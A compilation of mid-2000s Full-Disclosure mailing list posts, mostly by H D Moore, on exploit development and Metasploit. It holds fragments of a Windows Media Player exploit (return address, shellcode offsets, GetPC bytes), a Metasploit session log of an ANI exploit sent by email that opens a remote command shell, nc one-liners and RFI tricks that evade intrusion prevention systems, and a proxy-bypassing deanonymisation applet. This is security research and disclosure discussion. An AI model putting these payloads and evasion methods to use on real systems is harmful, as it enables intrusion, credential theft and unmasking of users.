Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread H D Moore 
Got it working finally :-) The alpha shellcode stuff is actually 
Skylined's (ported to perl), the non-alpha prefix is only used if you 
dont pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I 
am using an address in wmp.dll (v9) and tested it successfully on Firefox 
and Opera. Time to start porting to v10 and have it auto-detect the WMP 
version. Keep your SRC path less than 4K or you end up smashing the PEB's  
module list pointers (at least with Firefox)...

-HD


my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern   = Pex::Text::AlphaNumText(4096);

substr($pattern, 2082, 4,   "ABC=");   # inc, inc, inc, cmp eax, [ptr]  
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($shellcode), $shellcode);

my $content   = "";


On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <[EMAIL PROTECTED]> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> skechy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
>
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep  :)
>
> --
>
> regards
> c0ntex
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MS06-0[0]6 Windows Media Player Exploitation [CODE]

2006-02-17 Thread H D Moore 
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.  
[ snip ] 

> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent.  Thanks to the
> similarities of the heap management APIs and the fact that most DLLs
> from MS use high bases, I'd bet money that this works across WMP
> versions on anything from NT 4.0 to 2003. 

I ran into problems with Skylined's alphanumeric GetPC code - on Windows 
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our 
shellcode is one, since we smash SEH on the way down). Did some fancy 
8086 instructions to get around this (thanks vlad902 - the human 
assembler), so, for fwiw:

my $getpc = 
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

> It's likely, as well, that 
> this one technique works on any script-enabled browser that supports
> the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

> 'Nuff teasing.  Code attached.  It is important to note that you should
> read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!

-HD
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MS06-0[0]6 Windows Media Player Exploitation [CODE]

2006-02-17 Thread H D Moore 
Works well against Firefox 1.5.0.1 on the following systems:
- Windows XP SP2
- Windows 2003 SP0
- Windows 2000 SP4

However, it does not work with Opera 8.5 on any platform. Should just be a 
matter of changing return addresses based on the user-agent though...

-HD

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-Disclosure] USB risks - working autorun example (fwd from pen-test)

2006-03-21 Thread H D Moore 
These work great:
http://www.udrw.com/

-HD

On Tuesday 21 March 2006 11:24, Pego, Victor wrote:
> Hi,
>
> I need to figure out how to autorun a file on a USB flash pen drive.
> Just like you can do with a CD - put it in and it starts running the
> program - I want to do with the pen drive. I've read that they're not
> the same and you can't do it. but there are companies who sell the pen
> drives with autorun software or something, they promote it. i've
> searched for a long time, can't find anything. maybe i can make the
> program - the powerpoint file for example - self-execute somehow? any
> help?
>
> Thanks!!!
>
> Victor Pego
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fun with DHTML

2006-03-22 Thread H D Moore 
How bugs can you find in your browser? The recent IE issues only scratched 
the service of the DHTML/behavior bugs. The HTML/JS page below can be 
used to find all sorts of bugs in different browsers. I stopped caring 
about these after the first three invalid derefences.

http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

-HD

PS. If you find something easily exploitable, at least give the vendor a 
heads-up. Some of the new folks on the MS IE team are the same people who 
posted bugs to this list a couple years ago, so cut them some slack :-)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fun with DHTML

2006-03-23 Thread H D Moore 
On Thursday 23 March 2006 13:44, Georgi Guninski wrote:
> a triple more reasons to send all of your 0days to m$:

Can always count on you Georgi :-)

> 1. only you can save mankind
> (they still need you, so it is not clear if several years old
> tru$tworthy computing can save mankind)

You are the ONE!

> 2. help bill get richer

Hell yeah, can't let that IKEA guy take the title for richest man!

> 3. help m$ security engineers get bigger bonus/salary for handling the
> "incident" properly

If that means they pay for drinks next time I am in Seattle, more power to 
them. Would you prefer that money to go to the security engineer or to 
the anti-ODF marketing campaign? The way I see it, the more cash 
Microsoft diverts into the security, the less they will be spending on 
efforts I disagree with :-)

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Oracle read-only user can insert/update/delete data

2006-04-11 Thread H D Moore 
I dont believe you understand - the exploit details were available to 
anyone who could access Metalink. Alexander did not disclose these flaws, 
the Oracle user who posted the bug report did. The only reason Oracle 
takes security seriously is because folks like Mr. Kornbrust and Mr. 
Litchfield aren't afraid to publish their findings when the vendor tries 
to cover up yet another embarrassing software flaw.

-HD

On Wednesday 12 April 2006 00:38, Van Winssen, Andre A SITI-ITIBHW5 wrote:
> Alexander,
> I have to say it once again: your company is very careless and
> irresponsible for publishing so much detail about this new oracle
> security flaw for which no patch exists yet, endangering many customer
> production databases.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sample Packet Captures

2007-02-14 Thread H D Moore 
It might be more effective to contribute to the Wireshark Wiki:
 - http://wiki.wireshark.org/SampleCaptures

-HD

On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly,I am thinking to start a wiki which will contain various
> packet captures .It will help people in quickly getting the required
> dump for analysis/refrence purpose. I have started a wiki here:-
> http://secgeeks.com/packetland
> i would like to hear your feedback regarding this.feel free to upload
> any packet dump you might have.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Metasploit Framework 3.0 RELEASED!

2007-03-26 Thread H D Moore 
March 27th, 2007 -- Metasploit is pleased to announce the immediate,
free availability of the Metasploit Framework version 3.0 from
http://framework.metasploit.com/.


The Metasploit Framework ("Metasploit") is a development platform for
creating security tools and exploits. Version 3.0 contains 177
exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally,
30 auxiliary modules are included that perform a wide range of tasks,
including host discovery, protocol fuzzing, and denial of service testing. 

Metasploit is used by network security professionals to perform
penetration tests, system administrators to verify patch
installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby
programming language and includes components written in C and
assembler.  

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the command line scripting 
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools. 

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://framework.metasploit.com/


Metasploit 3 is a from-scratch rewrite of Metasploit 2 using the Ruby
scripting language. The development process took nearly two years to
complete and resulted in over 100,000 lines of Ruby code. As such,
there are some notable differences between version 2.7 and 3.0:
 
 * The Fs, Sys, Net, and Process extensions in the Metasploit 2.7
 Meterpreter have been combined into a single extension that is
 automatically loaded in Metasploit 3. The "stdapi" extension can be
 used to manipulate files, list and manage processes, migrate the
 payload into a new process, edit a file on the server, forward a
 port, execute a command, and many other tasks. The "priv" extension
 (accessible by the "use priv" command) provides the hashdump command
 for dumping password hashes and the timestomp command for erasing
 file system timestamps.  

 * The Meterpreter shell provides an "irb" command thats allows
 interactive scripting of a compromised system. One of the features of
 the Metasploit client API is the the ability to read and write the
 memory of any accessible process on the exploited system, all from
 inside a Ruby shell. When combined with a Meterpreter script (started
 with the "run" command from inside Meterpreter), this feature can be
 used to backdoor running applications or steal in-memory credentials.

 * The Metasploit console provides an "irb" command (on Unix systems
 only) thats allows direct access to the Ruby internals at runtime.
 This can be used to modify the behavior of the framework, interact
 with existing connections, and as a development environment for
 plugins.
 
 * The Metasploit console interface has a new "route" command that
 allows all network connections to a given subnet to be routed through
 an existing session. This can be used in conjunction with the
 Meterpreter payload to relay attacks through exploited systems.
 
 * Database support is provided via a set of plugins and a standard
 command interface. The database can be used to track host information
 during a penetration test and launch automated attacks against a
 network (db_autopwn). The current release can import both Nessus NBE
 files and Nmap XML output files. Data provided by these tools can be
 used to cross-reference open ports and vulnerabilities with
 Metasploit modules. 
 
 * User options have been separated into three types: standard,
 advanced, and evasion. Evasion options allow the user to bypass IDS
 and IPS systems by specifying how exploit data is generated and
 delivered. Evasion options are available for most exploits, with
 particular attention paid to the SMB, DCERPC, and HTTP protocols.
 
 * A plugin system allows developers to add their own commands to the
 console interface, hook framework events, and extend the framework at
 runtime without having to modify the base code. Examples plugins have
 been included in the "plugins" subdirectory of the framework. Example
 plugins include an "auto-tagger", a socket filter, a telnet service,
 and a number of database and debugging plugins.
 
 * An event subscription system allows modules and plugins to wait for
 specific events and automatically perform different actions. This
 feature can be used to hook socket operations, filter data flows,
 and automated post-exploitation tasks. 
 
 * Metasploit modules can import methods and behaviors from a huge
 library of Ruby Mixins. This release includes support for protocols
 such as SMB

[Full-disclosure] Metasploit vs ANI

2007-04-02 Thread H D Moore 
Two new exploit modules are available for version 3.0 of the Metasploit 
Framework. These modules can be obtained by using the 'Online Update' 
feature in Windows and the 'svn update' command on Unix-like systems.

Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metasploit.com/

The two exploits can be viewed in the svn repository at metasploit.com:
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb

The first module exploits the ANI flaw through Internet Explorer. It uses 
multiple icon files referenced from a single HTML page. This allows 
client-side brute forcing without resorting to javascript. This module 
will execute code on Windows 2000, Windows XP, and Windows Vista using 
the default target. As mentioned in the blog, a command shell is not 
directly accessible on Vista, but the Meterpreter payload can be used to 
bust out of the low-privileged process :-)

The second module exploits the ANI flaw through Outlook and Outlook 
Express. It sends a multipart MIME e-mail that contains multiple icons 
files referenced from a HTML message. This allows brute forcing of the 
correct target via the mail reader, all without any form of client-side 
scripting. To use this module, point RHOST and RPORT at a SMTP server 
that will relay your email. Set the MAILFROM and MAILTO options, select a 
payload, launch the exploit, and wait for your payload to execute.

An example session from the e-mail based exploit module:

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server localhost:20025...
[*] SMTP: 220 slug.metasploit.com ESMTP
[*] SMTP: 250-slug.metasploit.com
250-PIPELINING
250-8BITMIME
250-AUTH LOGIN PLAIN CRAM-MD5
250 SIZE 0
[*] SMTP: 250 ok
[*] SMTP: 250 ok
[*] Sending the message (404759 bytes)...
[*] SMTP: 354 go ahead
[*] SMTP: 250 ok 1175497222 qp 12648
[*] Closing the connection...
[*] SMTP: 221 slug.metasploit.com
[*] Waiting for a payload session (backgrounding)...
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) > 

[*] Command shell session 1 opened (192.168.0.127: -> 
192.168.0.127:37299)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\program files\Outlook Express>  

Enjoy!

- The Metasploit Staff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ...Alright I need a little help....

2007-04-17 Thread H D Moore 
Metasploit 2 only runs modules written in the Metasploit 2 Perl format.

Metasploit 3 only runs modules written in the Metasploit 3 Ruby format.

Keep in mind that many exploits also depend on a specific version or 
update of the Metasploit Framework. If the exploit is for Metasploit 3 
and uses the new Endpoint Mapper features, it will only work with a 
fully-updated version of Metasploit 3.0.

You can't "convert" a .rar or .c to a metasploit module directly, but you 
can "port" the exploit over if you know what you are doing.

Hope this helps,

-HD

PS. lol

On Tuesday 17 April 2007 13:46, srxnr srxnr wrote:
> So there are a few exploits written for metasploit. Now for the
> exploits written in ' .C ' for the new meatasploit doesn't work like
> before. Now it reads only ruby and or perl. So far i've looked around
> in my metasploit DIR and only found there to be .rb files.
> SO is it possible to convert a .c file to .rb so i can load it in
> metasploit.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] You shady bastards.

2007-06-06 Thread H D Moore 
Hello,

Some friends and I were putting together a contact list for the folks 
attending the Defcon conference this year in Las Vegas. My friend sent 
out an email, with a large CC list, asking people to respond if they 
planned on attending. The email was addressed to quite a few people, with 
one of them being David Maynor. Unfortunately, his old SecureWorks 
address was used, not his current address with ErrattaSec. 

Since one of the messages sent to the group contained a URL to our phone 
numbers and names, I got paranoid and decided to determine whether 
SecureWorks was still reading email addressed to David Maynor. I sent an 
email to David's old SecureWorks address, with a subject line promising 
0-day, and a link to a non-public URL on the metasploit.com web server 
(via SSL). Twelve hours later, someone from a Comcast cable modem in 
Atlanta tried to access the link, and this someone was (confirmed) not 
David. SecureWorks is based in Atlanta. All times are CDT.

I sent the following message last night at 7:02pm.

---
From: H D Moore 
To: David Maynor 
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200706051902.11544.hdm[at]metasploit.com>
Status: RO
X-Status: RSC

https://metasploit.com/maynor.tar.gz
---

Approximately 12 hours later, the following request shows up in my Apache 
log file. It looks like someone at SecureWorks is reading email addressed 
to David and tried to access the link I sent:

71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] "GET /maynor.tar.gz 
HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) 
AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"

This address resolves to:
c-71-59-27-152.hsd1.ga.comcast.net

The whois information is just the standard Comcast block boilerplate.

---

Is this illegal? I could see reading email addressed to him being within 
the bounds of the law, but it seems like trying to download the "0day" 
link crosses the line.

Illegal or not, this is still pretty damned shady.

Bastards.

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-19 Thread H D Moore 
Summarized from https://strikecenter.bpointsys.com/

Many commercial IPS products fail to decode HTTP requests which use 0x0c, 
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in 
the following format will evade most IPS protocol decoders:

$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \
 nc webserver 80

A request which contains multiple CRLF sequences instead of a valid method 
is processed by Apache, yet ignored by most IPS engines:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
 nc webserver 80

The first issue was covered more than a year ago, yet most IPS vendors 
have failed to address it. The second issue is new, as far as I know. You 
can even combine them:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \
 nc webserver 80

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread H D Moore 
Agreed. The point was that IPS vendors have put a large amount of effort 
into normalizing IIS-specific encodings, but fail to handle 
Apache-specific quirks. 

The note in RFC  2616, Section 4.1, refers to a single CRLF before the 
Request-Line. Prepending multiple CRLFs or non-printable characters (as 
coderman mentioned) falls outside of the RFC and I consider them 
Apache-specific HTTP evasions.

Jamie has a good point about the PHP RFI signatures. Many IPS products 
(sorry, I don't want to pick on any particular vendor) will look for a 
http:// URL to detect RFI attacks. Replacing http with one of the other 
protocol handlers (zip, ftp, file, smb on windows, etc) will evade many 
of these signatures. The php://filter/resource trick is a nice hack for 
evading existing signatures while still using a http URL for the included 
PHP code.

-HD

On Wednesday 20 June 2007 08:50, 3APA3A wrote:
> You  simply  MUST  accept  the  risk  there  is always the way to
> bypass content  filtering. IPS like doesn't protect your network by
> itself. IPS is nothing, but a tool.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread H D Moore 
Apparently I can't read before 10:00am :) 3APA3A corrected me, the RFC 
states that there can actually be multiple CRLF before the start of the 
request. Time to find some coffee...

Thanks for the feedback!

-HD

On Wednesday 20 June 2007 09:19, H D Moore wrote:
> The note in RFC  2616, Section 4.1, refers to a single CRLF before the
> Request-Line.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [ GLSA 200507-05 ] zlib: Buffer overflow

2005-07-06 Thread H D Moore 
Does anyone have an idea on how to trigger this? Debian and SuSE say this 
is a denial of service. Gentoo says "code execution", but they are the 
ones who found the bug. Most zlib bugs can be exploited prior to 
authentication in OpenSSH. The patch being is being distributed by the 
vendors and is not on zlib.org yet:

[ inftrees.c ]
-if (left > 0 && (type == CODES || (codes - count[0] != 1)))
+if (left > 0 && (type == CODES || max != 1))

-HD

On Wednesday 06 July 2005 09:23, Thierry Carrez wrote:
> Gentoo Linux Security Advisory   GLSA 200507-05

>   Severity: High
>  Title: zlib: Buffer overflow
>   Date: July 06, 2005
>   Bugs: #98121
> ID: 200507-05
>
> A buffer overflow has been discovered in zlib, potentially resulting in
> the execution of arbitrary code.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Advice RE Site Exploit

2005-07-18 Thread H D Moore 
It doesn't work that way ;-) You either get to abuse the bug or tell the 
them about it; trying to do both is what gets people put into jail. In 
your communication with the company, you could always ask for a discount 
on your service or some other perk (in a polite and non-demanding way), 
but IMO thats as far as you can go without it looking like extortion.

If you left your wallet in your car with the windows down and someone 
walks up to you and tells you about it, you will have one of two 
reactions. You will be happy that someone seemed concerned for your 
well-being or pissed off that some jerk was looking into your car in the 
first place. The reaction is going to depend on how you are approached 
and what they say. If they immediately ask for $10 on the grounds that 
they could have just taken your entire wallet, you might be motivated to 
break their face. Just because someone has the potential to rob you 
doesn't mean that you should be grateful to them if they don't :-) 

-HD

On Monday 18 July 2005 19:22, David Wilde wrote:
> Hello All,
>
> Long time lurker.  I have recently come across a rather significant
> (IMHO) exploit to gain access to a significant number of accounts held
> by one of the two satellite tv companies in the US.  I of course want
> to do the right thing (TM), but I also would like a free lifetime
> subscription to all of the channels with hardware upgrades at my
> discression :)  What is the best way of informing the company of my
> discovery and my wishes with the ultimate goal of 1) not going to jail
> being labeled a terrorist and threat to national security, and 2)
> getting what I want?
>
> TIA
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] vncviewer patched...

2006-05-16 Thread H D Moore 
No need to patch the client at all. The Metasploit Framework module 
proxies the connection and lets you exploit the flaw with any standard 
client. If you have vncviewer in your path (or are running the Windows 
version of the Framework), it also auto-connects :-)

-HD

http://metasploit.com/projects/Framework/exploits.html#realvnc_41_bypass

On Tuesday 16 May 2006 12:22, evilrabbi wrote:
> Hello,
>
> In case anyone was having trouble patching the vnc client I've supplied
> a patched binary that can be downloaded at
> http://www.nopsled.net/code/vncviewer.exe.vncviewer.exe>
>
> -- evilrabbi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Finding Function in Import Address Tables (IATs)

2006-05-22 Thread H D Moore 
Install the Metasploit Framework (v2.5), then use msfpescan:

$ msfpescan -f something.dll -D | grep IAT

-HD

On Monday 22 May 2006 10:43, Andres Molinetti wrote:
>   I want to find if a specific function is defined in a given set of
> dlls' IAT (Import Address Table).
>   Does anyone know a tool to perform this check?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] UnAnonymizer

2006-06-26 Thread H D Moore 
A fun browser toy that depends on Java for complete results:
- http://metasploit.com/research/misc/decloak/

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] UnAnonymizer

2006-06-27 Thread H D Moore 
If your real internal and external NAT addresses did not appear when using 
a proxy, either the Java applet did not load or a race condition failed. 
From browsing the database backend, it looks like just over 1,000 people 
were successfully identified (internal + nat gw + external + dns). The 
database is wiped every 24 hours.

The 'trick' is to obtain this information regardless of proxy settings 
and in the case of SOCKS4, be able to identify your real DNS servers. 
This is accomplished using a custom DNS service along with a Java applet 
that abuses the DatagramSocket/GetByName APIs to bypass any configured 
proxy. The source code of the applet is online as well:
- http://metasploit.com/research/misc/decloak/HelloWorld.java

There are a handful of other ways to obtain a user's real IP address - you 
can embed a link to a SMB service over a UNC path, start up another 
application via file attachments (PDF, with embedded JS, etc), or abuse 
any other network-aware app that is launched by the browser.

The goal of the "decloak" code is to provide a javascript-friendly way to 
obtain this information that doesn't notify the user that something 
strange is happening. A great use of this code would be to track down the 
real source of a malicious request being routed through a TOR exit node. 

Take this a step further by adding smart filtering and injection code to 
the TOR client itself and you have a solution for detecting and reporting 
"bad" traffic that happens to exit through your node (attempted server 
exploitation, pornography not involving adults, etc). My current 
implementation uses an embedded ruby intepreter and a set of ruby modules 
to perform the protocol detection and filtering.

Thanks for testing!

-HD

On Monday 26 June 2006 20:07, H D Moore wrote:
> A fun browser toy that depends on Java for complete results:
> - http://metasploit.com/research/misc/decloak/
>
> -HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Who should i contact?

2006-07-05 Thread H D Moore 
I have been receiving spam to unique addresses provided to H&R Block for 
over a year now. If this is the same company you used, you aren't the 
only one. Using an email address with the original company name clearly 
embedded within it makes tracking down this kind of abuse easier. It has 
a side effect of annoying sales weasels that try to follow up after I 
download crappy evaluation software. A quick scan of my mail logs from 
the past week shows 8 different companies that either sold or leaked my 
email address to spammers. 

-HD

On Wednesday 05 July 2006 03:09, [EMAIL PROTECTED] wrote:
> The recent thread on the exposed data containing hospital records
> made me think to ask something here.
>
> I have recently received spam to several email addresses created
> explicitly and solely for filing my US federal taxes online through
> an internet tax filing system. The emails I received are tied to
> four separate filings by four separate people on a COMPLETELY
> unrelated subject through an IP address managed by a completely
> different person than the entity that these addresses were given
> to.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft SMB Information Disclosure Vulnerability CVE-2006-1315

2006-07-11 Thread H D Moore 
Yet another SMB memory leak. There are tons of these in SRVSVC. The key to 
finding them is to force large padding values (ie. holes between 
DataOffset/ParameterOffset and end of packet). A quick hack is to use the 
SMB ECHO command with a non-aligned byte size. I have yet to see anything 
actually *useful* get leaked. The leak data usually contains parts of 
packets that I sent it previously - my few attempts at testing a busy 
domain controller never leaked anything I found interesting. Maybe McAfee 
found a way to leak larger blocks?

-HD

On Tuesday 11 July 2006 19:41, Alexander Sotirov wrote:
> This is hardly a "description" of the vulnerability. Your post does not
> include any information that was not already included in the Microsoft
> bulletin this morning.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Google Malware Search

2006-07-16 Thread H D Moore 
http://metasploit.com/research/misc/mwsearch/?q=bagle

Enjoy,

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Firefox fun

2006-07-28 Thread H D Moore 
The demonstration exploit now works on Windows, Linux, and both 
architectures of Mac OS X. A friend of mine reported that is also works 
on the Camino browser:

http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html

Enjoy,

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox fun

2006-07-28 Thread H D Moore 
Some of the reported crashes (IE 6, FF 1.5.0.5) could be the process 
running out of memory; the current demonstration uses a huge block of 
memory for reliability reasons. I should be able to tune the memory 
allocation for the final exploit (to be included in the metasploit 
framework). Thanks for all the feedback!

-HD

On Friday 28 July 2006 13:47, H D Moore wrote:
> The demonstration exploit now works on Windows, Linux, and both
> architectures of Mac OS X. A friend of mine reported that is also works
> on the Camino browser:
>
> http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object
>.html
>
> Enjoy,
>
> -HD
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] AxMan ActiveX Fuzzer

2006-08-01 Thread H D Moore 
AxMan is now public:
- http://metasploit.com/users/hdm/tools/axman/

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-09 Thread H D Moore 
Core Impact and Canvas both have exploits out. Metasploit technically has 
one, but it hasn't been completed/released yet.

-HD

On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit for MS06-040 Out?

2006-08-10 Thread H D Moore 
On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?

The Metasploit Framework module is now public, I included a copy of the 
email I sent to the Framework mailing list below.

For the lazy:
http://metasploit.com/projects/Framework/modules/exploits/netapi_ms06_040.pm

--  Forwarded Message  --

Subject: [framework] Metasploit Framework Updates
Date: Thursday 10 August 2006 02:52
From: H D Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]

Hello everyone,

I just pushed out a new round of updates for version 2.6 of the
 Metasploit Framework. This update includes new exploits, new features,
 and massive bug fixes. If it wasn't 3:00am on my birthday I would try
 for a 2.7 release :-)

New exploits:

netapi_ms06-040:
 - This exploit module should work against all Windows 2000 systems and
Windows XP SP0 and SP1. It will not work on XP SP2 or 2003 SP1. There is
a slim chance it can work with modification on 2003 SP0 and NT 4.0 SP6.
The automatic target should be reliable for most users. The cool thing
about this exploit is how it uses a strcpy call to place the shellcode
into a static buffer and then return straight back into it. I have
